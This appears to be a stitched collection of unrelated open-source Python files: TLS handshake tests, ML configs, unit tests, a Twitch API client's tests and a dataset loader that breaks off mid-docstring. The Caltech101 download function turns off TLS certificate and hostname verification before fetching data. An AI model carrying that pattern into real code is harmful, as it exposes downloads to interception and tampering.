@pytest.mark.parametrize("protocol", [Protocols.TLS12, Protocols.TLS13], ids=get_parameter_name)
@pytest.mark.parametrize("client_cipher", CIPHERS, ids=get_parameter_name)
@pytest.mark.parametrize("server_cipher", CIPHERS, ids=get_parameter_name)
def test_s2nc_to_s2nd_pq_handshake(managed_process, protocol, client_cipher, server_cipher):
port = next(available_ports)
client_options = ProviderOptions(
mode=Provider.ClientMode,
port=port,
insecure=True,
cipher=client_cipher,
protocol=protocol)
server_options = ProviderOptions(
mode=Provider.ServerMode,
port=port,
protocol=protocol,
cipher=server_cipher,
cert=Certificates.RSA_4096_SHA512.cert,
key=Certificates.RSA_4096_SHA512.key)
server = managed_process(S2N, server_options, timeout=5)
client = managed_process(S2N, client_options, timeout=5)
if pq_enabled():
expected_result = EXPECTED_RESULTS.get((client_cipher, server_cipher), None)
else:
# If PQ is not enabled in s2n, we expect classic handshakes to be negotiated.
# Leave the expected cipher blank, as there are multiple possibilities - the
# important thing is that kem and kem_group are NONE.
expected_result = {"cipher": "", "kem": "NONE", "kem_group": "NONE"}
# Client and server are both s2n; can make meaningful assertions about negotiation for both
for results in client.get_results():
results.assert_success()
assert_s2n_negotiation_parameters(results, expected_result)
for results in server.get_results():
results.assert_success()
assert_s2n_negotiation_parameters(results, expected_result)
@pytest.mark.uncollect_if(func=invalid_test_parameters)
@pytest.mark.parametrize("protocol", [Protocols.TLS13], ids=get_parameter_name)
@pytest.mark.parametrize("cipher", [Ciphers.PQ_TLS_1_0_2020_12], ids=get_parameter_name)
@pytest.mark.parametrize("kem_group", KEM_GROUPS, ids=get_parameter_name)
def test_s2nc_to_oqs_openssl_pq_handshake(managed_process, protocol, cipher, kem_group):
# If PQ is not enabled in s2n, there is no reason to test against oqs_openssl
if not pq_enabled():
return
port = next(available_ports)
client_options = ProviderOptions(
mode=Provider.ClientMode,
port=port,
insecure=True,
cipher=cipher,
protocol=protocol)
server_options = ProviderOptions(
mode=Provider.ServerMode,
port=port,
protocol=protocol,
cert=Certificates.RSA_4096_SHA512.cert,
key=Certificates.RSA_4096_SHA512.key,
env_overrides=get_oqs_openssl_override_env_vars(),
extra_flags=['-groups', kem_group.oqs_name])
server = managed_process(OpenSSL, server_options, timeout=5)
client = managed_process(S2N, client_options, timeout=5)
expected_result = EXPECTED_RESULTS.get((cipher, kem_group), None)
for results in client.get_results():
# Client is s2n; can make meaningful assertions about negotiation
results.assert_success()
assert_s2n_negotiation_parameters(results, expected_result)
for results in server.get_results():
# Server is OQS OpenSSL; just ensure the process exited successfully
results.assert_success()
@pytest.mark.uncollect_if(func=invalid_test_parameters)
@pytest.mark.parametrize("protocol", [Protocols.TLS13], ids=get_parameter_name)
@pytest.mark.parametrize("cipher", [Ciphers.PQ_TLS_1_0_2020_12], ids=get_parameter_name)
@pytest.mark.parametrize("kem_group", KEM_GROUPS, ids=get_parameter_name)
def test_oqs_openssl_to_s2nd_pq_handshake(managed_process, protocol, cipher, kem_group):
# If PQ is not enabled in s2n, there is no reason to test against oqs_openssl
if not pq_enabled():
return
port = next(available_ports)
client_options = ProviderOptions(
mode=Provider.ClientMode,
port=port,
protocol=protocol,
env_overrides=get_oqs_openssl_override_env_vars(),
extra_flags=['-groups', kem_group.oqs_name])
server_options = ProviderOptions(
mode=Provider.ServerMode,
port=port,
protocol=protocol,
cipher=cipher,
cert=Certificates.RSA_4096_SHA512.cert,
key=Certificates.RSA_4096_SHA512.key)
server = managed_process(S2N, server_options, timeout=5)
client = managed_process(OpenSSL, client_options, timeout=5)
expected_result = EXPECTED_RESULTS.get((kem_group, cipher), None)
for results in client.get_results():
# Client is OQS OpenSSL; just ensure the process exited successfully
results.assert_success()
for results in server.get_results():
# Server is s2n; can make meaningful assertions about negotiation
results.assert_success()
assert_s2n_negotiation_parameters(results, expected_result)
|
configs/models/aotl.py | yoxu515/aot-benchmark | 105 | 12635081 | <reponame>yoxu515/aot-benchmark<filename>configs/models/aotl.py
import os
from .default import DefaultModelConfig
class ModelConfig(DefaultModelConfig):
def __init__(self):
super().__init__()
self.MODEL_NAME = 'AOTL'
self.MODEL_LSTT_NUM = 3
self.TRAIN_LONG_TERM_MEM_GAP = 2
self.TEST_LONG_TERM_MEM_GAP = 5 |
02_advanced/02_debugging/ex_01_compute_test_value.py | johny-c/theano_exercises | 711 | 12635083 | # Run
# python 01_compute_test_value.py
# It should raise an exception when it tries to execute the call to fn.
# The exception doesn't make it easy to tell which line of the python script
# first created an invalid expression though.
# Modify the script to use compute_test_value to find the first bad line.
import numpy as np
from theano import function
from theano import tensor as T
a = T.vector()
b = T.log(a)
c = T.nnet.sigmoid(b)
d = T.sqrt(c)
e = T.concatenate((d, c), axis=0)
f = b * c * d
g = e + f
h = g / c
fn = function([a], h)
fn(np.ones((3,)).astype(a.dtype))
print "SUCCESS!"
|
test/swig/nnScalarOperators.py | AyishaR/deepC | 223 | 12635116 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-argument
#
# This file is part of DNN compiler maintained at
# https://github.com/ai-techsystems/dnnCompiler
import common; # DNNC path setup
import deepC.dnnc as dc
import numpy as np
import unittest, random, math
def temp_softsign(x):
return (x / (1 + np.abs(x)));
def temp_erf(x):
y = np.vectorize(math.erf)(x).astype(np.float32)
return y
class nnScalarOperatorsTest(unittest.TestCase):
def setUp(self):
self.random_number1 = random.randrange(20, 50, 3)
self.random_number2 = random.randrange(200, 500, 1)
self.random_number3 = random.randrange(10, 500, 2)
# self.np_a = np.array(self.random_number1).astype(np.float32)
# self.np_b = np.array(self.random_number2).astype(np.float32)
# self.dc_a = dc.array([self.random_number1])
# self.dc_b = dc.array([self.random_number2])
self.np_a = self.random_number1
self.np_b = self.random_number2
self.dc_a = self.random_number1
self.dc_b = self.random_number2
def test_nnScalar_asin (self):
np.testing.assert_allclose(np.arcsin(1), dc.asin(1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.arcsin(0), dc.asin(0), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.arcsin(-1), dc.asin(-1), rtol=1e-3, atol=1e-3)
def test_nnScalar_acos (self):
np.testing.assert_allclose(np.arccos(1), dc.acos(1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.arccos(0), dc.acos(0), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.arccos(-1), dc.acos(-1), rtol=1e-3, atol=1e-3)
def test_nnScalar_atan (self):
np.testing.assert_allclose(np.arctan(self.random_number1), dc.atan(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.arctan(self.random_number2), dc.atan(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.arctan(self.random_number3), dc.atan(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_asinh (self):
np.testing.assert_allclose(np.arcsinh(self.random_number1), dc.asinh(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.arcsinh(self.random_number2), dc.asinh(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.arcsinh(self.random_number3), dc.asinh(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_acosh (self):
np.testing.assert_allclose(np.arccosh(self.random_number1), dc.acosh(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.arccosh(self.random_number2), dc.acosh(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.arccosh(self.random_number3), dc.acosh(self.random_number3), rtol=1e-3, atol=1e-3)
# def test_nnScalar_atanh (self):
# np.testing.assert_allclose(np.arctanh(self.random_number1), dc.atanh(self.random_number1), rtol=1e-3, atol=1e-3)
# np.testing.assert_allclose(np.arctanh(self.random_number2), dc.atanh(self.random_number2), rtol=1e-3, atol=1e-3)
# np.testing.assert_allclose(np.arctanh(self.random_number3), dc.atanh(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_sin (self):
np.testing.assert_allclose(np.sin(self.random_number1), dc.sin(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.sin(self.random_number2), dc.sin(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.sin(self.random_number3), dc.sin(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_cos (self):
np.testing.assert_allclose(np.cos(self.random_number1), dc.cos(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.cos(self.random_number2), dc.cos(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.cos(self.random_number3), dc.cos(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_tan (self):
np.testing.assert_allclose(np.tan(self.random_number1), dc.tan(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.tan(self.random_number2), dc.tan(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.tan(self.random_number3), dc.tan(self.random_number3), rtol=1e-3, atol=1e-3)
# def test_nnScalar_sinh (self):
# np.testing.assert_allclose(np.sinh(self.random_number1), dc.sinh(self.random_number1), rtol=1e-3, atol=1e-3)
# np.testing.assert_allclose(np.sinh(self.random_number2), dc.sinh(self.random_number2), rtol=1e-3, atol=1e-3)
# np.testing.assert_allclose(np.sinh(self.random_number3), dc.sinh(self.random_number3), rtol=1e-3, atol=1e-3)
# def test_nnScalar_cosh (self):
# np.testing.assert_allclose(np.cosh(self.random_number1), dc.cosh(self.random_number1), rtol=1e-3, atol=1e-3)
# np.testing.assert_allclose(np.cosh(self.random_number2), dc.cosh(self.random_number2), rtol=1e-3, atol=1e-3)
# np.testing.assert_allclose(np.cosh(self.random_number3), dc.cosh(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_tanh (self):
np.testing.assert_allclose(np.tanh(self.random_number1), dc.tanh(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.tanh(self.random_number2), dc.tanh(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.tanh(self.random_number3), dc.tanh(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_erf (self):
np.testing.assert_allclose(temp_erf(self.random_number1), dc.erf(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(temp_erf(self.random_number2), dc.erf(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(temp_erf(self.random_number3), dc.erf(self.random_number3), rtol=1e-3, atol=1e-3)
# def test_nnScalar_exp (self):
# np.testing.assert_allclose(np.exp(self.random_number1), dc.exp(self.random_number1), rtol=1e-3, atol=1e-3)
# np.testing.assert_allclose(np.exp(self.random_number2), dc.exp(self.random_number2), rtol=1e-3, atol=1e-3)
# np.testing.assert_allclose(np.exp(self.random_number3), dc.exp(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_log (self):
np.testing.assert_allclose(np.log(self.random_number1), dc.log(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.log(self.random_number2), dc.log(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.log(self.random_number3), dc.log(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_logical_not (self):
np.testing.assert_allclose(np.logical_not(self.random_number1), dc.logical_not(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.logical_not(self.random_number2), dc.logical_not(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.logical_not(self.random_number3), dc.logical_not(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_sign (self):
np.testing.assert_allclose(np.sign(self.random_number1), dc.sign(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.sign(self.random_number2), dc.sign(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(np.sign(self.random_number3), dc.sign(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_softsign (self):
np.testing.assert_allclose(temp_softsign(self.random_number1), dc.softsign(self.random_number1), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(temp_softsign(self.random_number2), dc.softsign(self.random_number2), rtol=1e-3, atol=1e-3)
np.testing.assert_allclose(temp_softsign(self.random_number3), dc.softsign(self.random_number3), rtol=1e-3, atol=1e-3)
def test_nnScalar_max (self):
npr = np.maximum(self.np_a, self.np_b)
dcr = dc.max([self.dc_a,self.dc_b])
np.testing.assert_allclose(npr, np.array(dcr).astype(np.float32),rtol=1e-3, atol=1e-3)
def test_nnScalar_min (self):
npr = np.minimum(self.np_a, self.np_b)
dcr = dc.min([self.dc_a,self.dc_b])
np.testing.assert_allclose(npr, np.array(dcr).astype(np.float32),rtol=1e-3, atol=1e-3)
def tearDown(self):
return "test finished"
if __name__ == '__main__':
unittest.main()
|
tests/api/test_communities.py | LEv145/python-twitch-client | 171 | 12635172 | <filename>tests/api/test_communities.py
import json
import pytest
import responses
from twitch.client import TwitchClient
from twitch.constants import BASE_URL
from twitch.exceptions import TwitchAttributeException
from twitch.resources import Community, User
example_community = {
"_id": "e9f17055-810f-4736-ba40-fba4ac541caa",
"name": "DallasTesterCommunity",
}
example_user = {
"_id": "44322889",
"name": "dallas",
}
@responses.activate
def test_get_by_name():
responses.add(
responses.GET,
"{}communities".format(BASE_URL),
body=json.dumps(example_community),
status=200,
content_type="application/json",
)
client = TwitchClient("client id")
community = client.communities.get_by_name("spongebob")
assert len(responses.calls) == 1
assert isinstance(community, Community)
assert community.id == example_community["_id"]
assert community.name == example_community["name"]
@responses.activate
def test_get_by_id():
community_id = "abcd"
responses.add(
responses.GET,
"{}communities/{}".format(BASE_URL, community_id),
body=json.dumps(example_community),
status=200,
content_type="application/json",
)
client = TwitchClient("client id")
community = client.communities.get_by_id(community_id)
assert len(responses.calls) == 1
assert isinstance(community, Community)
assert community.id == example_community["_id"]
assert community.name == example_community["name"]
@responses.activate
def test_update():
community_id = "abcd"
responses.add(
responses.PUT,
"{}communities/{}".format(BASE_URL, community_id),
body=json.dumps(example_community),
status=204,
content_type="application/json",
)
client = TwitchClient("client id")
client.communities.update(community_id)
assert len(responses.calls) == 1
@responses.activate
def test_get_top():
response = {"_cursor": "MTA=", "_total": 100, "communities": [example_community]}
responses.add(
responses.GET,
"{}communities/top".format(BASE_URL),
body=json.dumps(response),
status=200,
content_type="application/json",
)
client = TwitchClient("client id")
communities = client.communities.get_top()
assert len(responses.calls) == 1
assert len(communities) == 1
community = communities[0]
assert isinstance(community, Community)
assert community.id == example_community["_id"]
assert community.name == example_community["name"]
@responses.activate
@pytest.mark.parametrize("param,value", [("limit", 101)])
def test_get_top_raises_if_wrong_params_are_passed_in(param, value):
client = TwitchClient("client id")
kwargs = {param: value}
with pytest.raises(TwitchAttributeException):
client.communities.get_top(**kwargs)
@responses.activate
def test_get_banned_users():
community_id = "abcd"
response = {"_cursor": "", "banned_users": [example_user]}
responses.add(
responses.GET,
"{}communities/{}/bans".format(BASE_URL, community_id),
body=json.dumps(response),
status=200,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
users = client.communities.get_banned_users(community_id)
assert len(responses.calls) == 1
assert len(users) == 1
user = users[0]
assert isinstance(user, User)
assert user.id == example_user["_id"]
assert user.name == example_user["name"]
@responses.activate
@pytest.mark.parametrize("param,value", [("limit", 101)])
def test_get_banned_users_raises_if_wrong_params_are_passed_in(param, value):
client = TwitchClient("client id", "oauth token")
kwargs = {param: value}
with pytest.raises(TwitchAttributeException):
client.communities.get_banned_users("1234", **kwargs)
@responses.activate
def test_ban_user():
community_id = "abcd"
user_id = 1234
responses.add(
responses.PUT,
"{}communities/{}/bans/{}".format(BASE_URL, community_id, user_id),
status=204,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
client.communities.ban_user(community_id, user_id)
assert len(responses.calls) == 1
@responses.activate
def test_unban_user():
community_id = "abcd"
user_id = 1234
responses.add(
responses.DELETE,
"{}communities/{}/bans/{}".format(BASE_URL, community_id, user_id),
status=204,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
client.communities.unban_user(community_id, user_id)
assert len(responses.calls) == 1
@responses.activate
def test_create_avatar_image():
community_id = "abcd"
responses.add(
responses.POST,
"{}communities/{}/images/avatar".format(BASE_URL, community_id),
status=204,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
client.communities.create_avatar_image(community_id, "imagecontent")
assert len(responses.calls) == 1
@responses.activate
def test_delete_avatar_image():
community_id = "abcd"
responses.add(
responses.DELETE,
"{}communities/{}/images/avatar".format(BASE_URL, community_id),
status=204,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
client.communities.delete_avatar_image(community_id)
assert len(responses.calls) == 1
@responses.activate
def test_create_cover_image():
community_id = "abcd"
responses.add(
responses.POST,
"{}communities/{}/images/cover".format(BASE_URL, community_id),
status=204,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
client.communities.create_cover_image(community_id, "imagecontent")
assert len(responses.calls) == 1
@responses.activate
def test_delete_cover_image():
community_id = "abcd"
responses.add(
responses.DELETE,
"{}communities/{}/images/cover".format(BASE_URL, community_id),
status=204,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
client.communities.delete_cover_image(community_id)
assert len(responses.calls) == 1
@responses.activate
def test_get_moderators():
community_id = "abcd"
response = {"moderators": [example_user]}
responses.add(
responses.GET,
"{}communities/{}/moderators".format(BASE_URL, community_id),
body=json.dumps(response),
status=200,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
moderators = client.communities.get_moderators(community_id)
assert len(responses.calls) == 1
assert len(moderators) == 1
user = moderators[0]
assert isinstance(user, User)
assert user.id == example_user["_id"]
assert user.name == example_user["name"]
@responses.activate
def test_add_moderator():
community_id = "abcd"
user_id = 12345
responses.add(
responses.PUT,
"{}communities/{}/moderators/{}".format(BASE_URL, community_id, user_id),
status=204,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
client.communities.add_moderator(community_id, user_id)
assert len(responses.calls) == 1
@responses.activate
def test_delete_moderator():
community_id = "abcd"
user_id = 12345
responses.add(
responses.DELETE,
"{}communities/{}/moderators/{}".format(BASE_URL, community_id, user_id),
status=204,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
client.communities.delete_moderator(community_id, user_id)
assert len(responses.calls) == 1
@responses.activate
def test_get_permissions():
community_id = "abcd"
response = {"ban": True, "timeout": True, "edit": True}
responses.add(
responses.GET,
"{}communities/{}/permissions".format(BASE_URL, community_id),
body=json.dumps(response),
status=200,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
permissions = client.communities.get_permissions(community_id)
assert len(responses.calls) == 1
assert isinstance(permissions, dict)
assert permissions["ban"] is True
@responses.activate
def test_report_violation():
community_id = "abcd"
responses.add(
responses.POST,
"{}communities/{}/report_channel".format(BASE_URL, community_id),
status=204,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
client.communities.report_violation(community_id, 12345)
assert len(responses.calls) == 1
@responses.activate
def test_get_timed_out_users():
community_id = "abcd"
response = {"_cursor": "", "timed_out_users": [example_user]}
responses.add(
responses.GET,
"{}communities/{}/timeouts".format(BASE_URL, community_id),
body=json.dumps(response),
status=200,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
users = client.communities.get_timed_out_users(community_id)
assert len(responses.calls) == 1
assert len(users) == 1
user = users[0]
assert isinstance(user, User)
assert user.id == example_user["_id"]
assert user.name == example_user["name"]
@responses.activate
@pytest.mark.parametrize("param,value", [("limit", 101)])
def test_get_timed_out_users_raises_if_wrong_params_are_passed_in(param, value):
client = TwitchClient("client id", "oauth token")
kwargs = {param: value}
with pytest.raises(TwitchAttributeException):
client.communities.get_timed_out_users("1234", **kwargs)
@responses.activate
def test_add_timed_out_user():
community_id = "abcd"
user_id = 12345
responses.add(
responses.PUT,
"{}communities/{}/timeouts/{}".format(BASE_URL, community_id, user_id),
status=204,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
client.communities.add_timed_out_user(community_id, user_id, 5)
assert len(responses.calls) == 1
@responses.activate
def test_delete_timed_out_user():
community_id = "abcd"
user_id = 12345
responses.add(
responses.DELETE,
"{}communities/{}/timeouts/{}".format(BASE_URL, community_id, user_id),
status=204,
content_type="application/json",
)
client = TwitchClient("client id", "oauth token")
client.communities.delete_timed_out_user(community_id, user_id)
assert len(responses.calls) == 1
|
lib/coloraide/spaces/xyz.py | facelessuser/ColorHelper | 253 | 12635178 | """XYZ D65 class."""
from ..spaces import Space, RE_DEFAULT_MATCH, GamutUnbound
import re
class XYZ(Space):
"""XYZ D65 class."""
SPACE = "xyz"
SERIALIZE = ("xyz", "xyz-d65")
CHANNEL_NAMES = ("x", "y", "z", "alpha")
DEFAULT_MATCH = re.compile(RE_DEFAULT_MATCH.format(color_space='|'.join(SERIALIZE), channels=3))
WHITE = "D65"
RANGE = (
GamutUnbound([0.0, 1.0]),
GamutUnbound([0.0, 1.0]),
GamutUnbound([0.0, 1.0])
)
@property
def x(self):
"""X channel."""
return self._coords[0]
@x.setter
def x(self, value):
"""Shift the X."""
self._coords[0] = self._handle_input(value)
@property
def y(self):
"""Y channel."""
return self._coords[1]
@y.setter
def y(self, value):
"""Set Y."""
self._coords[1] = self._handle_input(value)
@property
def z(self):
"""Z channel."""
return self._coords[2]
@z.setter
def z(self, value):
"""Set Z channel."""
self._coords[2] = self._handle_input(value)
@classmethod
def _to_xyz(cls, parent, xyz):
"""To XYZ."""
return parent.chromatic_adaptation(cls.WHITE, XYZ.WHITE, xyz)
@classmethod
def _from_xyz(cls, parent, xyz):
"""From XYZ."""
return parent.chromatic_adaptation(XYZ.WHITE, cls.WHITE, xyz)
|
homeassistant/components/kulersky/const.py | MrDelik/core | 30,023 | 12635182 | <filename>homeassistant/components/kulersky/const.py
"""Constants for the Kuler Sky integration."""
DOMAIN = "kulersky"
DATA_ADDRESSES = "addresses"
DATA_DISCOVERY_SUBSCRIPTION = "discovery_subscription"
|
tests/template_tests/templatetags/tag_27584.py | ni-ning/django | 61,676 | 12635212 | <filename>tests/template_tests/templatetags/tag_27584.py
from django import template
register = template.Library()
@register.tag
def badtag(parser, token):
parser.parse(('endbadtag',))
parser.delete_first_token()
return BadNode()
class BadNode(template.Node):
def render(self, context):
raise template.TemplateSyntaxError('error')
|
vol2/vol2-python-examples/examples/example_crossover.py | Sun-Joong/aifh | 777 | 12635230 | <gh_stars>100-1000
#!/usr/bin/env python
"""
Artificial Intelligence for Humans
Volume 2: Nature-Inspired Algorithms
Python Version
http://www.aifh.org
http://www.jeffheaton.com
Code repository:
https://github.com/jeffheaton/aifh
Copyright 2014 by <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
For more information on Heaton Research copyrights, licenses
and trademarks visit:
http://www.heatonresearch.com/copyright
============================================================================================================
This example uses crossover to combine two parent genomes to produce two children.
Both repeating and non-repeating splice are used.
Crossover Splice
Parent 1: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
Parent 2: [10, 9, 8, 7, 6, 5, 4, 3, 2, 1]
Offspring 1: [1, 2, 3, 4, 5, 6, 4, 3, 2, 1]
Offspring 2: [10, 9, 8, 7, 6, 5, 7, 8, 9, 10]
Crossover Splice No Repeat
Parent 1: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
Parent 2: [10, 9, 8, 7, 6, 5, 4, 3, 2, 1]
Offspring 1: [10, 3, 2, 4, 5, 6, 7, 8, 9, 1]
Offspring 2: [1, 8, 9, 7, 6, 5, 4, 3, 2, 10]
"""
import sys
import os
# Find the AIFH core files
aifh_dir = os.path.dirname(os.path.abspath(__file__))
aifh_dir = os.path.abspath(aifh_dir + os.sep + ".." + os.sep + "lib" + os.sep + "aifh")
sys.path.append(aifh_dir)
from genetic import *
from genetic import Genome
from genetic import Species
p1 = [ 1,2,3,4,5,6,7,8,9,10 ]
p2 = [ 10,9,8,7,6,5,4,3,2,1 ]
off = [[],[]]
pop = Population()
print("Crossover Splice")
crossover_splice(pop, p1,p2,off)
print("Parent 1: " + str(p1))
print("Parent 2: " + str(p2))
print("Offspring 1: " + str(off[0]))
print("Offspring 2: " + str(off[1]))
print()
print("Crossover Splice No Repeat")
crossover_splice_no_repeat(pop, p1,p2,off)
print("Parent 1: " + str(p1))
print("Parent 2: " + str(p2))
print("Offspring 1: " + str(off[0]))
print("Offspring 2: " + str(off[1])) |
tests/ut/python/pass/test_helptiling.py | tianjiashuo/akg | 286 | 12635231 | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from akg.utils import kernel_exec as utils
LEVEL1_SUCC = "Help tiling level 1 exit successfully"
LEVEL2_SUCC = "Help tiling level 2 exit successfully"
LEVEL3_SUCC = "Help tiling level 3 exit successfully"
def build_five2four(shape_5d, dtype, op_attrs, attrs, kernel_name='five2four', tuning=False):
from akg.ops.array.ascend import five2four
utils.op_build_test(five2four.five2four, [shape_5d], [dtype], op_attrs, kernel_name=kernel_name, attrs=attrs, tuning=tuning)
def test_five2four():
shape_5d = [1, 1, 1088, 1, 16]
dtype = "float32"
op_attrs = [[1, 1088, 1, 16], "float32", 'NHWC']
try:
attrs = {"help_tiling": 1}
build_five2four(shape_5d, dtype, op_attrs, attrs)
except SystemExit:
logging.info(LEVEL1_SUCC)
try:
attrs = {"help_tiling": 2}
build_five2four(shape_5d, dtype, op_attrs, attrs)
except SystemExit:
logging.info(LEVEL2_SUCC)
try:
attrs = {"help_tiling": 3}
build_five2four(shape_5d, dtype, op_attrs, attrs)
except SystemExit:
logging.info(LEVEL3_SUCC)
if __name__ == "__main__":
test_five2four()
|
stonesoup/detector/tests/test_tensorflow.py | Red-Portal/Stone-Soup-1 | 157 | 12635246 | # -*- coding: utf-8 -*
import pytest
try:
from stonesoup.detector.tensorflow import TensorFlowBoxObjectDetector
except ImportError:
# Catch optional dependencies import error
pytest.skip(
"Skipping due to missing optional dependencies. Usage of the TensorFlow detectors "
"requires that TensorFlow and the TensorFlow Object Detection API are installed. A quick "
"guide on how to set these up can be found here: "
"https://tensorflow-object-detection-api-tutorial.readthedocs.io/en/latest/install.html",
allow_module_level=True
)
def test_tensorflow_box_object_detector():
# Expect Type error
with pytest.raises(TypeError):
TensorFlowBoxObjectDetector()
# TODO: Add more tests
|
libs/input_modules/get_datasets.py | dylancashman/metaqnn | 136 | 12635252 | <gh_stars>100-1000
import numpy as np
import os
import pickle
import shutil
import struct
import tarfile
import urllib
import ssl
from scipy import io, misc
def get_caltech101(save_dir=None, root_path=None):
assert((save_dir is not None and root_path is None) or (save_dir is None and root_path is not None))
if root_path is None:
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
print 'Downloading Caltech101 dataset...'
tar_path = os.path.join(save_dir, "101_ObjectCategories.tar.gz")
url = urllib.URLopener(context=ctx)
url.retrieve("https://www.vision.caltech.edu/Image_Datasets/Caltech101/101_ObjectCategories.tar.gz", tar_path)
print 'Download Done, Extracting...'
tar = tarfile.open(tar_path)
tar.extractall(save_dir)
tar.close()
root = os.path.join(save_dir, "101_ObjectCategories") if not root_path else root_path
train_x = []
train_y = []
val_x = []
val_y = []
label = 0
for cls_folder in os.listdir(root):
cls_root = os.path.join(root, cls_folder)
if not os.path.isdir(cls_root):
continue
cls_images = [misc.imread(os.path.join(cls_root, img_name)) for img_name in os.listdir(cls_root)]
cls_images = [np.repeat(np.expand_dims(img, 2), 3, axis=2) if len(img.shape) == 2 else img for img in cls_images]
cls_images = np.array([np.reshape(misc.imresize(img, (224,224,3)), (3,224,224)) for img in cls_images])
new_index = np.random.permutation(np.arange(cls_images.shape[0]))
cls_images = cls_images[new_index, :, :, :]
train_x.append(cls_images[:30])
train_y.append(np.array([label]*30))
if len(cls_images) <= 80:
val_x.append(cls_images[30:])
val_y.append(np.array([label]*(len(cls_images)-30)))
else:
val_x.append(cls_images[30:80])
val_y.append(np.array([label]*50))
label += 1
Xtr = np.concatenate(train_x)
Ytr = np.concatenate(train_y)
Xval= np.concatenate(val_x)
Yval= np.concatenate(val_y)
print 'Xtr shape ', Xtr.shape
print 'Ytr shape ', Ytr.shape
print 'Xval shape ', Xval.shape
print 'Yval shape ', Yval.shape
return Xtr, Ytr, Xval, Yval
def load_CIFAR_batch(filename):
""" load single batch of cifar """
with open(filename, 'rb') as f:
datadict = pickle.load(f)
X = datadict['data']
Y = datadict['labels']
X = X.reshape(10000, 3, 32, 32).astype(np.uint8)
Y = np.array(Y, dtype=np.int64)
return X, Y
def get_cifar10(save_dir=None, root_path=None):
''' If root_path is None, we download the data set from internet.
Either save path or root path must not be None and not both.
